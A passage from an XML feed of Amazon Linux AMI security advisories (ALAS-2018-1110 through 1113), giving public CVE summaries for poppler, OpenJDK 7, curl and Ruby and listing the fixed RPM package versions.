</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16997" title="" id="CVE-2017-16997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11236" title="" id="CVE-2018-11236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11237" title="" id="CVE-2018-11237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6485" title="" id="CVE-2018-6485" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-common" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="260.175.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-260.175.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-260.175.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-260.175.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="260.175.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-260.175.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1110</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1110: low priority package update for poppler</title><issued date="2018-12-06 00:26:00" /><updated date="2018-12-07 00:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13988:
Poppler through 0.62 contains an out of bounds read vulnerability due to an incorrect memory access that is not mapped in its memory space, as demonstrated by pdfunite. This can result in memory corruption and denial of service. This may be exploitable when a victim opens a specially crafted PDF file.
1602838:
CVE-2018-13988 poppler: out of bounds read in pdfunite
CVE-2018-10768:
There is a NULL pointer dereference in the AnnotPath::getCoordsLength function in Annot.h in an Ubuntu package for Poppler 0.24.5. A crafted input will lead to a remote denial of service attack. Later Ubuntu packages such as for Poppler 0.41.0 are not affected.
1576169:
CVE-2018-10768 poppler: NULL pointer dereference in Annot.h:AnnotPath::getCoordsLength() allows for denial of service via crafted PDF
CVE-2017-18267:
The FoFiType1C::cvtGlyph function in fofi/FoFiType1C.cc in Poppler through 0.64.0 allows remote attackers to cause a denial of service (infinite recursion) via a crafted PDF file, as demonstrated by pdftops.
1578777:
CVE-2017-18267 poppler: Infinite recursion in fofi/FoFiType1C.cc:FoFiType1C::cvtGlyph() function allows denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18267" title="" id="CVE-2017-18267" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10768" title="" id="CVE-2018-10768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13988" title="" id="CVE-2018-13988" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-debuginfo" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="20.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-20.18.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-20.18.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="20.18.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-20.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1111</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1111: critical priority package update for java-1.7.0-openjdk</title><issued date="2018-12-06 00:28:00" /><updated date="2018-12-07 00:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3214:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Sound). Supported versions that are affected are Java SE: 6u201, 7u191 and 8u182; Java SE Embedded: 8u181; JRockit: R28.3.19. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1639301:
CVE-2018-3214 OpenJDK: Infinite loop in RIFF format reader (Sound, 8205361)
CVE-2018-3180:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JSSE). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via SSL/TLS to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded, JRockit accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded, JRockit accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L).
1639484:
CVE-2018-3180 OpenJDK: Missing endpoint identification algorithm check during TLS session resumption (JSSE, 8202613)
CVE-2018-3169:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639293:
CVE-2018-3169 OpenJDK: Improper field access checks (Hotspot, 8199226)
CVE-2018-3149:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639834:
CVE-2018-3149 OpenJDK: Incomplete enforcement of the trustURLCodebase restriction (JNDI, 8199177)
CVE-2018-3139:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1639442:
CVE-2018-3139 OpenJDK: Leak of sensitive header data via HTTP redirect (Networking, 8196902)
CVE-2018-3136:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.4 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N).
1639755:
CVE-2018-3136 OpenJDK: Incorrect handling of unsigned attributes in signed Jar manifests (Security, 8194534)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3136" title="" id="CVE-2018-3136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3139" title="" id="CVE-2018-3139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3149" title="" id="CVE-2018-3149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3169" title="" id="CVE-2018-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3180" title="" id="CVE-2018-3180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3214" title="" id="CVE-2018-3214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.201-2.6.16.0.77.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.201-2.6.16.0.77.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.201" release="2.6.16.0.77.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.201-2.6.16.0.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1112</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1112: low priority package update for curl</title><issued date="2018-12-06 00:29:00" /><updated date="2018-12-07 00:55:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14618:
curl before version 7.61.1 is vulnerable to a buffer overrun in the NTLM authentication code. The internal function Curl_ntlm_core_mk_nt_hash multiplies the length of the password by two (SUM) to figure out how large temporary storage area to allocate from the heap. The length value is then subsequently used to iterate over the password and generate output into the allocated storage buffer. On systems with a 32 bit size_t, the math to calculate SUM triggers an integer overflow when the password length exceeds 2GB (2^31 bytes). This integer overflow usually causes a very small buffer to actually get allocated instead of the intended very huge one, making the use of that buffer end up in a heap buffer overflow. (This bug is almost identical to CVE-2017-8816.)
1622707:
CVE-2018-14618 curl: NTLM password overflow via integer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14618" title="" id="CVE-2018-14618" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-16.85.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-16.85.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-16.85.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-16.85.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="16.85.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-16.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1113</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1113: important priority package update for ruby23 ruby24</title><issued date="2018-12-06 00:31:00" /><updated date="2018-12-14 19:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16396:
An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.
1643089:
CVE-2018-16396 ruby: Tainted flags are not propagated in Array#pack and String#unpack with some directives
CVE-2018-16395:
An issue was discovered in the OpenSSL library in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. When two OpenSSL::X509::Name objects are compared using ==, depending on the ordering, non-equal objects may return true. When the first argument is one character longer than the second, or the second argument contains a character that is one less than a character in the same position of the first argument, the result of == will be true. This could be leveraged to create an illegitimate certificate that may be accepted as legitimate and then used in signing or encryption operations.
1643086:
CVE-2018-16395 ruby: OpenSSL::X509::Name equality check does not work correctly
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16395" title="" id="CVE-2018-16395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16396" title="" id="CVE-2018-16396" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby23-doc" version="2.3.8" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.8-1.20.amzn1.noarch.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.20.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby23-libs" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems23" version="2.5.2.3" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.3-1.20.amzn1.noarch.rpm</filename></package><package name="ruby23-irb" version="2.3.8" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.8-1.20.amzn1.noarch.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby23" version="2.3.8" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.8-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.3" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.3-1.20.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.20.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.20.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.20.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.8" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.8-1.20.amzn1.i686.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.3" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.3-1.30.7.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.7.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.14.3" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.3-1.30.7.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.5-1.30.7.amzn1.noarch.rpm</filename></package><package name="ruby24-doc" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.5-1.30.7.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.7.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.5-1.30.7.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.7.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.7.amzn1" epoch="0" 